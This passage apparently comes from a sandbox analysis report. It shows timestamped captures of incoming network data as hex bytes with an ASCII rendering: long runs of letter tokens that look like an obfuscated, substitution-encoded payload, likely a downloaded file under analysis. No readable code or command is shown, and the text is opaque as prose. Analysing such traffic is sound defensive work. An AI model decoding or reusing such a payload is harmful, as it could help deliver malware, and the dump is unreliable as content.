                                                  2021-10-29 18:30:02 UTC2163INData Raw: 20 4f 20 4b 45 20 45 20 51 20 78 20 4f 6b 78 20 4f 20 4b 6b 20 45 20 51 20 78 20 4f 6b 4b 20 4f 20 59 45 20 45 20 51 20 78 20 4f 6b 6b 20 4f 20 59 6b 20 45 20 51 20 78 20 4f 51 6f 20 4f 20 52 45 20 45 20 51 20 78 20 4f 51 52 20 4f 20 52 6b 20 45 20 51 20 78 20 6f 78 78 20 4f 20 74 45 20 45 20 51 20 78 20 6f 78 4b 20 4f 20 74 6b 20 45 20 51 20 78 20 6f 78 6b 20 4f 20 6b 45 20 45 20 51 20 78 20 6f 4f 6f 20 4f 20 6b 6b 20 45 20 51 20 78 20 6f 4f 52 20 4f 20 51 45 20 45 20 51 20 78 20 6f 6f 78 20 4f 20 51 6b 20 45 20 51 20 78 20 6f 6f 4b 20 4f 20 4f 78 45 20 45 20 51 20 78 20 6f 6f 6b 20 4f 20 4f 78 6b 20 45 20 51 20 78 20 6f 45 6f 20 4f 20 4f 4f 45 20 45 20 51 20 78 20 6f 45 52 20 4f 20 4f 4f 6b 20 45 20 51 20 78 20 6f 4b 78 20 4f 20 4f 6f 45 20 45 20 51 20
                                                  Data Ascii: O KE E Q x Okx O Kk E Q x OkK O YE E Q x Okk O Yk E Q x OQo O RE E Q x OQR O Rk E Q x oxx O tE E Q x oxK O tk E Q x oxk O kE E Q x oOo O kk E Q x oOR O QE E Q x oox O Qk E Q x ooK O OxE E Q x ook O Oxk E Q x oEo O OOE E Q x oER O OOk E Q x oKx O OoE E Q
                                                  2021-10-29 18:30:02 UTC2179INData Raw: 74 20 4f 4f 78 20 4f 78 78 20 4f 78 6b 20 4f 78 4f 20 74 51 20 4f 4f 78 20 6b 45 20 4f 4f 52 20 51 74 20 51 51 20 4f 78 74 20 78 20 6b 6f 20 4f 78 4f 20 4f 78 45 20 4f 78 59 20 4f 4f 59 20 4f 4f 52 20 4f 4f 4b 20 4f 6f 4f 20 74 59 20 4f 78 4f 20 4f 6f 4f 20 6b 78 20 4f 78 4f 20 4f 4f 4b 20 4f 78 51 20 4f 78 59 20 4f 4f 59 20 4f 4f 59 20 4f 78 59 20 4f 4f 4f 20 4f 4f 78 20 52 74 20 4f 78 4b 20 4f 78 4f 20 51 51 20 4f 78 74 20 78 20 52 59 20 4f 78 6b 20 4f 78 6b 20 4f 4f 4f 20 51 51 20 74 6f 20 74 4f 20 4f 78 6b 20 4f 4f 4f 20 51 6b 20 51 74 20 4f 78 6b 20 78 20 74 78 20 4f 4f 4b 20 4f 78 4f 20 4f 78 4f 20 74 6f 20 74 4f 20 4f 78 6b 20 4f 4f 4f 20 51 6b 20 51 74 20 4f 78 6b 20 78 20 74 74 20 51 74 20 4f 4f 4b 20 4f 4f 59 20 4f 78 4b 20 51 74 20 4f 78 6b 20
                                                  Data Ascii: t OOx Oxx Oxk OxO tQ OOx kE OOR Qt QQ Oxt x ko OxO OxE OxY OOY OOR OOK OoO tY OxO OoO kx OxO OOK OxQ OxY OOY OOY OxY OOO OOx Rt OxK OxO QQ Oxt x RY Oxk Oxk OOO QQ to tO Oxk OOO Qk Qt Oxk x tx OOK OxO OxO to tO Oxk OOO Qk Qt Oxk x tt Qt OOK OOY OxK Qt Oxk
                                                  2021-10-29 18:30:02 UTC2195INData Raw: 6f 20 6f 6f 59 20 4f 6b 6f 20 4f 45 78 20 6f 6f 59 20 4f 6b 6f 20 4f 59 4f 20 6f 6f 59 20 4f 6b 4f 20 4f 52 59 20 6f 6f 59 20 4f 6b 6f 20 4f 45 78 20 6f 6f 59 20 4f 6b 4f 20 4f 74 6f 20 6f 6f 59 20 4f 6b 4f 20 4f 6b 52 20 6f 6f 59 20 4f 6b 6f 20 4f 45 78 20 78 20 6f 45 45 20 4f 45 6f 20 4f 51 78 20 6f 45 45 20 4f 45 45 20 4f 59 78 20 6f 45 45 20 4f 45 45 20 4f 74 4b 20 6f 45 45 20 4f 45 45 20 4f 6b 59 20 6f 45 45 20 4f 45 45 20 4f 59 52 20 6f 45 45 20 4f 45 45 20 4f 6b 51 20 6f 45 45 20 4f 45 45 20 4f 74 59 20 6f 45 45 20 4f 45 45 20 4f 74 4f 20 6f 45 45 20 4f 45 45 20 4f 74 4f 20 6f 45 45 20 4f 45 45 20 4f 59 45 20 6f 45 45 20 4f 45 45 20 4f 6f 51 20 6f 45 45 20 4f 45 6f 20 4f 6b 51 20 6f 45 45 20 4f 45 6f 20 4f 6b 52 20 6f 45 45 20 4f 45 45 20 4f 4b 51
                                                  Data Ascii: o ooY Oko OEx ooY Oko OYO ooY OkO ORY ooY Oko OEx ooY OkO Oto ooY OkO OkR ooY Oko OEx x oEE OEo OQx oEE OEE OYx oEE OEE OtK oEE OEE OkY oEE OEE OYR oEE OEE OkQ oEE OEE OtY oEE OEE OtO oEE OEE OtO oEE OEE OYE oEE OEE OoQ oEE OEo OkQ oEE OEo OkR oEE OEE OKQ
                                                  2021-10-29 18:30:02 UTC2211INData Raw: 4f 20 4f 6f 51 20 4f 6b 51 20 6f 45 4f 20 4f 6f 51 20 4f 4b 78 20 6f 45 4f 20 4f 45 78 20 4f 4b 78 20 6f 45 4f 20 4f 6f 51 20 4f 4b 45 20 6f 45 4f 20 4f 45 78 20 4f 45 78 20 6f 45 4f 20 4f 6f 51 20 4f 6b 59 20 6f 45 4f 20 4f 6f 51 20 4f 4b 6f 20 78 20 6f 45 59 20 4f 45 45 20 4f 4b 74 20 6f 45 59 20 4f 45 45 20 4f 74 74 20 6f 45 59 20 4f 45 45 20 4f 51 78 20 6f 45 59 20 4f 45 45 20 4f 52 6f 20 6f 45 59 20 4f 45 4b 20 4f 4b 4b 20 6f 45 59 20 4f 45 45 20 4f 4b 78 20 6f 45 59 20 4f 45 4b 20 4f 45 4b 20 6f 45 59 20 4f 45 45 20 4f 74 4b 20 6f 45 59 20 4f 45 45 20 4f 4b 52 20 6f 45 59 20 4f 45 45 20 4f 4b 78 20 6f 45 59 20 4f 45 4b 20 4f 6f 51 20 6f 45 59 20 4f 45 45 20 4f 4b 4f 20 6f 45 59 20 4f 45 45 20 4f 4b 4b 20 6f 45 59 20 4f 45 45 20 4f 6b 6b 20 6f 45 59
                                                  Data Ascii: O OoQ OkQ oEO OoQ OKx oEO OEx OKx oEO OoQ OKE oEO OEx OEx oEO OoQ OkY oEO OoQ OKo x oEY OEE OKt oEY OEE Ott oEY OEE OQx oEY OEE ORo oEY OEK OKK oEY OEE OKx oEY OEK OEK oEY OEE OtK oEY OEE OKR oEY OEE OKx oEY OEK OoQ oEY OEE OKO oEY OEE OKK oEY OEE Okk oEY
                                                  2021-10-29 18:30:02 UTC2227INData Raw: 4f 4b 74 20 4f 4b 78 20 6f 6f 6b 20 4f 4b 52 20 4f 59 51 20 6f 6f 6b 20 4f 4b 52 20 4f 6b 4f 20 6f 6f 6b 20 4f 4b 52 20 4f 6b 6b 20 6f 6f 6b 20 4f 4b 52 20 4f 59 4f 20 6f 6f 6b 20 4f 4b 52 20 4f 59 45 20 6f 6f 6b 20 4f 4b 52 20 4f 59 4f 20 78 20 6f 45 4f 20 4f 4b 52 20 4f 59 6f 20 6f 45 4f 20 4f 4b 52 20 4f 4b 6b 20 6f 45 4f 20 4f 4b 52 20 4f 59 45 20 6f 45 4f 20 4f 4b 74 20 4f 45 45 20 6f 45 4f 20 4f 4b 52 20 4f 6b 74 20 6f 45 4f 20 4f 4b 52 20 4f 59 4b 20 6f 45 4f 20 4f 4b 74 20 4f 45 74 20 6f 45 4f 20 4f 4b 52 20 4f 59 78 20 6f 45 4f 20 4f 4b 74 20 4f 45 52 20 6f 45 4f 20 4f 4b 74 20 4f 45 59 20 6f 45 4f 20 4f 4b 52 20 4f 6b 78 20 6f 45 4f 20 4f 4b 52 20 4f 59 52 20 6f 45 4f 20 4f 4b 74 20 4f 45 4b 20 6f 45 4f 20 4f 4b 52 20 4f 74 6b 20 6f 45 4f 20 4f
                                                  Data Ascii: OKt OKx ook OKR OYQ ook OKR OkO ook OKR Okk ook OKR OYO ook OKR OYE ook OKR OYO x oEO OKR OYo oEO OKR OKk oEO OKR OYE oEO OKt OEE oEO OKR Okt oEO OKR OYK oEO OKt OEt oEO OKR OYx oEO OKt OER oEO OKt OEY oEO OKR Okx oEO OKR OYR oEO OKt OEK oEO OKR Otk oEO O
                                                  2021-10-29 18:30:02 UTC2243INData Raw: 4b 20 4f 52 4f 20 6f 45 78 20 4f 52 4b 20 4f 4b 6f 20 6f 45 78 20 4f 52 4b 20 4f 6b 59 20 6f 45 78 20 4f 52 45 20 4f 74 51 20 6f 45 78 20 4f 52 4b 20 4f 59 4f 20 6f 45 78 20 4f 52 45 20 4f 6b 45 20 6f 45 78 20 4f 52 4b 20 4f 52 6f 20 78 20 6f 6f 74 20 4f 74 4b 20 4f 52 51 20 6f 6f 74 20 4f 74 4b 20 4f 52 52 20 6f 6f 74 20 4f 74 59 20 4f 59 78 20 6f 6f 74 20 4f 74 4b 20 4f 52 6f 20 6f 6f 74 20 4f 74 4b 20 4f 52 6b 20 6f 6f 74 20 4f 74 59 20 4f 45 45 20 6f 6f 74 20 4f 74 59 20 4f 45 74 20 6f 6f 74 20 4f 74 4b 20 4f 52 4b 20 6f 6f 74 20 4f 74 59 20 4f 74 78 20 6f 6f 74 20 4f 74 59 20 4f 52 4b 20 6f 6f 74 20 4f 74 59 20 4f 59 4b 20 6f 6f 74 20 4f 74 59 20 4f 4b 59 20 6f 6f 74 20 4f 74 59 20 4f 4b 6b 20 6f 6f 74 20 4f 74 59 20 4f 4b 59 20 6f 6f 74 20 4f 74 4b
                                                  Data Ascii: K ORO oEx ORK OKo oEx ORK OkY oEx ORE OtQ oEx ORK OYO oEx ORE OkE oEx ORK ORo x oot OtK ORQ oot OtK ORR oot OtY OYx oot OtK ORo oot OtK ORk oot OtY OEE oot OtY OEt oot OtK ORK oot OtY Otx oot OtY ORK oot OtY OYK oot OtY OKY oot OtY OKk oot OtY OKY oot OtK
                                                  2021-10-29 18:30:02 UTC2259INData Raw: 4f 74 4f 20 6f 45 6b 20 4f 6b 4b 20 4f 4b 78 20 6f 45 6b 20 4f 6b 45 20 4f 74 4f 20 6f 45 6b 20 4f 6b 4b 20 4f 59 4b 20 6f 45 6b 20 4f 6b 4b 20 4f 52 74 20 6f 45 6b 20 4f 6b 4b 20 4f 59 74 20 6f 45 6b 20 4f 6b 45 20 4f 74 6f 20 78 20 6f 45 45 20 4f 6b 4b 20 4f 45 4f 20 6f 45 45 20 4f 6b 4b 20 4f 74 6f 20 6f 45 45 20 4f 6b 4b 20 4f 6f 6b 20 6f 45 45 20 4f 6b 4b 20 4f 59 4f 20 6f 45 45 20 4f 6b 4b 20 4f 59 6f 20 6f 45 45 20 4f 6b 4b 20 4f 74 4f 20 6f 45 45 20 4f 6b 4b 20 4f 74 45 20 6f 45 45 20 4f 6b 4b 20 4f 74 59 20 6f 45 45 20 4f 6b 4b 20 4f 74 4f 20 6f 45 45 20 4f 6b 4b 20 4f 59 52 20 6f 45 45 20 4f 6b 45 20 4f 51 78 20 6f 45 45 20 4f 6b 4b 20 4f 59 6b 20 6f 45 45 20 4f 6b 45 20 4f 51 78 20 6f 45 45 20 4f 6b 4b 20 4f 74 4b 20 6f 45 45 20 4f 6b 4b 20 4f
                                                  Data Ascii: OtO oEk OkK OKx oEk OkE OtO oEk OkK OYK oEk OkK ORt oEk OkK OYt oEk OkE Oto x oEE OkK OEO oEE OkK Oto oEE OkK Ook oEE OkK OYO oEE OkK OYo oEE OkK OtO oEE OkK OtE oEE OkK OtY oEE OkK OtO oEE OkK OYR oEE OkE OQx oEE OkK OYk oEE OkE OQx oEE OkK OtK oEE OkK O
                                                  2021-10-29 18:30:02 UTC2275INData Raw: 45 20 6f 45 59 20 4f 45 45 20 4f 4b 6b 20 6f 45 59 20 4f 45 45 20 4f 6b 45 20 6f 45 59 20 4f 45 45 20 4f 45 51 20 6f 45 59 20 4f 45 45 20 4f 6b 4f 20 6f 45 59 20 4f 45 45 20 4f 45 51 20 6f 45 59 20 4f 45 45 20 4f 4b 78 20 6f 45 59 20 4f 45 45 20 4f 6b 78 20 6f 45 59 20 4f 45 45 20 4f 52 4f 20 6f 45 59 20 4f 45 45 20 4f 45 4f 20 6f 45 59 20 4f 45 4b 20 4f 45 51 20 6f 45 59 20 4f 45 45 20 4f 6b 45 20 78 20 6f 6f 74 20 4f 59 4f 20 4f 74 52 20 6f 6f 74 20 4f 59 4f 20 4f 52 51 20 6f 6f 74 20 4f 59 4f 20 4f 4b 74 20 6f 6f 74 20 4f 59 78 20 4f 51 78 20 6f 6f 74 20 4f 59 4f 20 4f 4b 6b 20 6f 6f 74 20 4f 59 4f 20 4f 74 6f 20 6f 6f 74 20 4f 59 78 20 4f 6b 6f 20 6f 6f 74 20 4f 59 4f 20 4f 74 78 20 6f 6f 74 20 4f 59 78 20 4f 6b 51 20 6f 6f 74 20 4f 59 4f 20 4f 6b 6b
                                                  Data Ascii: E oEY OEE OKk oEY OEE OkE oEY OEE OEQ oEY OEE OkO oEY OEE OEQ oEY OEE OKx oEY OEE Okx oEY OEE ORO oEY OEE OEO oEY OEK OEQ oEY OEE OkE x oot OYO OtR oot OYO ORQ oot OYO OKt oot OYx OQx oot OYO OKk oot OYO Oto oot OYx Oko oot OYO Otx oot OYx OkQ oot OYO Okk
                                                  2021-10-29 18:30:02 UTC2291INData Raw: 20 78 20 52 59 20 78 20 52 52 20 78 20 52 74 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 52 20 78 20 59 6f 20 78 20 74 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 4f 4f 51 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                  Data Ascii: x RY x RR x Rt x RY x kO x RR x Yo x tE x kO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x OOQ x OOQ x OOQ x RY x RY x to x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                  2021-10-29 18:30:02 UTC2307INData Raw: 78 20 4b 45 20 78 20 4f 78 59 20 78 20 4f 4f 78 20 78 20 6b 78 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 74 45 20 78 20 4b 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 74 78 20 78 20 52 74 20 78 20 74 52 20 78 20 52 52 20 78 20 4f 4f 4f 20 78 20 4f 4f 6b 20 78 20 74 51 20 78 20 4b 74 20 78 20 4b 51 20 78 20 52 59 20 78 20 6b 4f 20 78 20 59 4b 20 78 20 4f 6f 4f 20 78 20 4f 78 51 20 78 20 74 52 20 78 20 52 52 20 78 20 4f 78 51 20 78 20 51 74 20 78 20 52 6b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 6b 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 59 52 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 59 78 20 78 20 4b 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 59 20 78 20 4b 74 20 78 20 6b 59 20 78 20 6b
                                                  Data Ascii: x KE x OxY x OOx x kx x OxE x RY x RY x kY x tE x KQ x tx x OOR x tx x Rt x tR x RR x OOO x OOk x tQ x Kt x KQ x RY x kO x YK x OoO x OxQ x tR x RR x OxQ x Qt x Rk x OOo x Qk x kK x Kt x Kt x OOk x YR x RY x OxR x kQ x Yx x Kk x Kt x Kt x YY x Kt x kY x k
                                                  2021-10-29 18:30:02 UTC2323INData Raw: 51 6b 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4f 78 74 20 78 20 52 51 20 78 20 6b 52 20 78 20 59 6f 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 4b 45 20 78 20 52 59 20 78 20 4b 45 20 78 20 74 78 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 59 52 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 59 6f 20 78 20 59 78 20 78 20 74 78 20 78 20 59 6f 20 78 20 4f 4f 6b 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 74 6b 20 78 20 6b 4f 20 78 20 51 78 20 78 20 4f 4f 4f 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 59 6f 20 78 20 6b 78 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 78 52 20 78 20 4f 4f 74 20
                                                  Data Ascii: Qk x OxE x Kt x Oxt x RQ x kR x Yo x Oxk x Oxx x KE x RY x KE x tx x OOO x RY x RY x RY x RY x tR x YR x tE x RY x OxE x RY x RY x kR x Yo x Yx x tx x Yo x OOk x YO x Kt x Kt x KQ x tk x kO x Qx x OOO x OxQ x Oxx x Yo x kx x YO x Kt x Kt x KE x OxR x OOt
                                                  2021-10-29 18:30:02 UTC2339INData Raw: 20 74 78 20 78 20 74 4f 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 6b 59 20 78 20 74 74 20 78 20 51 51 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 74 74 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 59 52 20 78 20 6b 4f 20 78 20 74 74 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 51 6b 20 78 20 52 6b 20 78 20 6b 59 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 74 74 20 78 20 59 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 4f 4f 51 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 4f 6f 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 59 20 78 20 59 4b 20 78 20 74 6b 20 78 20 74 74 20 78 20 4f 4f 6b 20 78 20 52
                                                  Data Ascii: tx x tO x OOO x RY x kY x tt x QQ x tO x Kk x tt x OOo x RY x RY x tQ x OxR x kt x OxY x RY x RY x RY x OxE x YR x kO x tt x OxY x YR x Qk x Rk x kY x tR x OxQ x tt x YR x Oxt x RY x RY x Oox x OOQ x Rk x kO x OoO x Oxt x RY x RY x YK x tk x tt x OOk x R
                                                  2021-10-29 18:30:02 UTC2355INData Raw: 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 74 78 20 78 20 51 78 20 78 20 4f 78 52 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 4b 20 78 20 4f 4f 51 20 78 20 4b 51 20 78 20 6b 74 20 78 20 74 52 20 78 20 59 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 74 45 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 78 20 78 20 4f 4f 51 20 78 20 74 45 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 59 78 20 78 20 74 45 20 78 20 4f 4f 52 20 78 20 74 6b 20 78 20 52 6b 20 78 20 74 45 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 59 45 20 78 20 74 45 20 78 20 4f 4f 52 20 78 20
                                                  Data Ascii: Q x kO x RY x RY x Rk x Kt x Oxx x kO x OxR x Kt x tx x Qx x OxR x RR x kO x RY x Rk x tK x OOQ x KQ x kt x tR x YY x tE x kx x OOY x tY x tE x tk x Oxk x Yo x RY x Rt x tx x OOQ x tE x Oxk x tk x Yx x tE x OOR x tk x Rk x tE x Oxk x tk x YE x tE x OOR x
                                                  2021-10-29 18:30:02 UTC2371INData Raw: 20 78 20 4b 6b 20 78 20 4b 74 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 4b 20 78 20 6b 52 20 78 20 59 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 4f 78 6f 20 78 20 6b 4b 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 4f 20 78 20 59 4b 20 78 20 74 78 20 78 20 74 45 20 78 20 6b 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 4f 78 6f 20 78 20 6b 4b 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 4f 20 78 20 51 74 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 74 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 4f 78 6f 20 78 20 6b 4b 20 78 20 4b 51 20 78 20
                                                  Data Ascii: x Kk x Kt x Oxo x Kt x Kt x YK x tK x kR x Yx x RY x RY x Rt x tk x OxK x Oxo x kK x Yt x Kt x Kt x Yt x kO x YK x tx x tE x kx x RY x RY x Rt x tk x OxK x Oxo x kK x Yt x Kt x Kt x Yt x kO x Qt x RY x Rk x tt x kO x RY x Rt x tk x OxK x Oxo x kK x KQ x
                                                  2021-10-29 18:30:02 UTC2387INData Raw: 20 4f 78 52 20 78 20 52 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 4f 78 6f 20 78 20 4f 78 52 20 78 20 4f 4f 4f 20 78 20 6b 45 20 78 20 4f 78 6b 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 52 51 20 78 20 52 6b 20 78 20 6b 78 20 78 20 59 74 20 78 20 4b 51 20 78 20 4b 45 20 78 20 74 45 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 74 20 78 20 59 74 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 78 20 78 20 4b 6b 20 78 20 6b 78 20 78 20 4b 74 20 78 20 74 78 20 78 20 6b 6f 20 78 20 6b 4b 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 51 20 78 20 4f 78 45 20 78 20 59 4b 20 78 20 6b 6b 20 78 20 4f 78 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74
                                                  Data Ascii: OxR x RQ x kO x RY x Rk x Kt x Oxx x Oxo x OxR x OOO x kE x Oxk x OOO x RY x RY x tE x kx x RQ x Rk x kx x Yt x KQ x KE x tE x OOk x kQ x Yt x Yt x OOY x Qk x Yx x Kk x kx x Kt x tx x ko x kK x RY x kO x RY x RR x OxQ x OxE x YK x kk x Oxt x Yt x Kt x Kt
                                                  2021-10-29 18:30:02 UTC2403INData Raw: 20 78 20 4b 74 20 78 20 6b 74 20 78 20 74 51 20 78 20 4b 74 20 78 20 4f 4f 74 20 78 20 74 52 20 78 20 59 52 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 51 20 78 20 74 51 20 78 20 4b 74 20 78 20 74 6b 20 78 20 4b 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 6b 78 20 78 20 4b 74 20 78 20 74 78 20 78 20 6b 6f 20 78 20 4f 78 52 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 52 20 78 20 6b 78 20 78 20 6b 59 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 52 20 78 20 59 78 20 78 20 74 4f 20 78 20 4f 4f 4f 20 78 20 74 45 20 78 20 6b 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 6b 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 4f 4f 6f 20 78 20 6b 4b 20 78 20 4f 78 59 20 78 20 4b 74 20 78 20 52 6b 20 78
                                                  Data Ascii: x Kt x kt x tQ x Kt x OOt x tR x YR x to x kO x RQ x tQ x Kt x tk x KQ x tK x Oxk x kx x Kt x tx x ko x OxR x Rt x kO x RY x Rt x tR x kx x kY x Ooo x RY x kO x RY x Rt x tR x Yx x tO x OOO x tE x kY x Kt x Kt x kk x Qt x OxE x OOo x kK x OxY x Kt x Rk x
                                                  2021-10-29 18:30:02 UTC2419INData Raw: 4f 78 6b 20 78 20 4f 78 78 20 78 20 4b 6b 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 52 74 20 78 20 4b 74 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 59 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 74 20 78 20 51 78 20 78 20 4f 78 52 20 78 20 4f 78 74 20 78 20 4f 78 4f 20 78 20 52 6b 20 78 20 59 6f 20 78 20 6b 4f 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 6b 6b 20 78 20 6b 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 4b 6b 20 78 20 6b 6b 20 78 20 4f 4f 4f 20 78 20 52 6b 20 78 20 59 59 20 78 20 51 51 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 78 52 20 78 20 4b 6b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 52 20 78 20 74 78 20 78 20 74 51 20 78 20 6b 52 20 78 20
                                                  Data Ascii: Oxk x Oxx x Kk x tQ x OxR x Rt x Kt x Oxo x Kt x Kt x OxY x YO x kY x tt x Qx x OxR x Oxt x OxO x Rk x Yo x kO x OOk x RY x kO x RY x RY x OxY x kk x kk x OOO x OxY x Kk x kk x OOO x Rk x YY x QQ x RY x Qx x OxR x Kk x OxE x RY x to x kR x tx x tQ x kR x
                                                  2021-10-29 18:30:02 UTC2435INData Raw: 78 20 4b 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4b 74 20 78 20 4f 6f 78 20 78 20 6b 59 20 78 20 4b 6b 20 78 20 4f 4f 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6b 20 78 20 4b 51 20 78 20 59 59 20 78 20 74 4b 20 78 20 4f 4f 51 20 78 20 4b 51 20 78 20 6b 74 20 78 20 74 52 20 78 20 59 59 20 78 20 74 45 20 78 20 6b 78 20 78 20 4f 4f 59 20 78 20 6b 4f 20 78 20 74 4f 20 78 20 51 74 20 78 20 52 6b 20 78 20 51 78 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 4f 78 52 20 78 20 59 4b 20 78 20 74 6b 20 78 20 6b 6f 20 78 20 51 51 20 78 20 74 4b 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 74 78 20 78 20 52 6b 20 78 20 4f 4f 4f
                                                  Data Ascii: x Kt x Oxx x kO x Ooo x Kt x Oxx x kO x OxK x kt x Kt x Oox x kY x Kk x OOQ x kY x RY x RY x kk x KQ x YY x tK x OOQ x KQ x kt x tR x YY x tE x kx x OOY x kO x tO x Qt x Rk x Qx x QQ x RY x RY x Qt x OxR x YK x tk x ko x QQ x tK x OOE x RY x tx x Rk x OOO
                                                  2021-10-29 18:30:02 UTC2451INData Raw: 20 52 59 20 78 20 74 74 20 78 20 59 52 20 78 20 4f 78 6b 20 78 20 4f 4f 45 20 78 20 74 78 20 78 20 74 78 20 78 20 4f 4f 45 20 78 20 74 52 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 4f 78 6f 20 78 20 4f 78 59 20 78 20 52 6b 20 78 20 59 45 20 78 20 52 6b 20 78 20 52 52 20 78 20 59 74 20 78 20 59 74 20 78 20 4f 78 74 20 78 20 74 52 20 78 20 4f 6f 4f 20 78 20 74 78 20 78 20 74 6f 20 78 20 4f 4f 4f 20 78 20 74 6f 20 78 20 6b 59 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 78 51 20 78 20 59 59 20 78 20 52 74 20 78 20 6b 78 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 78 51 20 78 20 74 4b 20 78 20 6b 6f 20 78 20 4b 6b 20 78 20 52 74 20 78 20 74 4b 20 78 20 6b 6b 20 78 20 4f 78 6f 20 78 20 4f 6f 4f 20 78
